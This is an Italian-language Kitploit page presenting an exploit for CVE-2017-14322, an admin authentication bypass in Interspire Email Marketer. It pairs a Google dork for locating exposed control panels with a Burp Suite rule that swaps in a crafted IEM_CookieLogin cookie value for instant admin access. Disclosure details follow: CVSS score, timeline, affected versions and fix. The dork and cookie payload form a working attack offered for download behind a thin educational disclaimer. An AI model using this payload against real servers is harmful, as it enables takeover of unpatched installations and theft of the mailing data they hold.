Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-14322 — CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit | Kitploit
Strumenti/GitHubGitHub/joesmithjaffa/cve-2017-14322
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubjoesmithjaffa/cve-2017-14322

CVE-2017-14322

CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit

Vedi Repository
5128 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2017-14322 Exploit per Interspire Email Marketer (emailmarketer)

Google Dork

root@kitploit:~
intitle:"Control Panel" + emailmarketer

Exploit utilizzando Burp Suit

Aggiungi una regola Match and Replace per l'header della Request come di seguito:

root@kitploit:~
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D

Quando apri il sito, non funzionerà al primo tentativo perché l'header Cookie non è presente. Aggiorna il sito una seconda volta usando il proxy Burp con la regola aggiunta sopra e vedrai ciò che volevi. Assicurati di spuntare "Intercept Client Requests"

Titolo:

Interspire Email Marketer - Bypass dell'autenticazione remota dell'admin

Autore:

Hakan Küsne, Infoteam Security (CH)

CVE-ID:

CVE-2017-14322

Informazioni sul rischio:

CVSS Base Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O

Cronologia:

2017-09-12 Vulnerabilità scoperta 2017-09-12 Scoperto che il vendor aveva già corretto la vulnerabilità ma non lo aveva mai comunicato ai clienti, lasciando centinaia di sistemi vulnerabili in the wild 2017-10-17 Divulgazione pubblica

Prodotti interessati:

Interspire Email Marketer precedente alla versione 6.1.6

Homepage del vendor:

http://www.interspire.com/emailmarketer/

Dettagli:

La funzione incaricata di verificare se l'utente è già connesso, init.php in Interspire Email Marketer (IEM) precedente alla 6.1.6, consente a un attaccante remoto di bypassare l'autenticazione e ottenere accesso amministrativo utilizzando il cookie IEM_CookieLogin con un valore appositamente costruito. Inoltre, se il cliente non dispone di un piano di manutenzione annuale, l'applicazione dichiara di essere all'ultima versione disponibile e che non ci sono aggiornamenti.

Le vulnerabilità sono state scoperte durante un incident response su un'istanza compromessa dell'applicazione.

Proof of Concept:

Dettagli forniti qui: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html

Fix:

Il vendor ha corretto la vulnerabilità nella versione 6.1.6, ma non l'ha mai comunicato specificamente ai propri clienti.

Nota:

Questo exploit è solo a scopo educativo e non siamo responsabili delle tue azioni.

Scarica lo strumento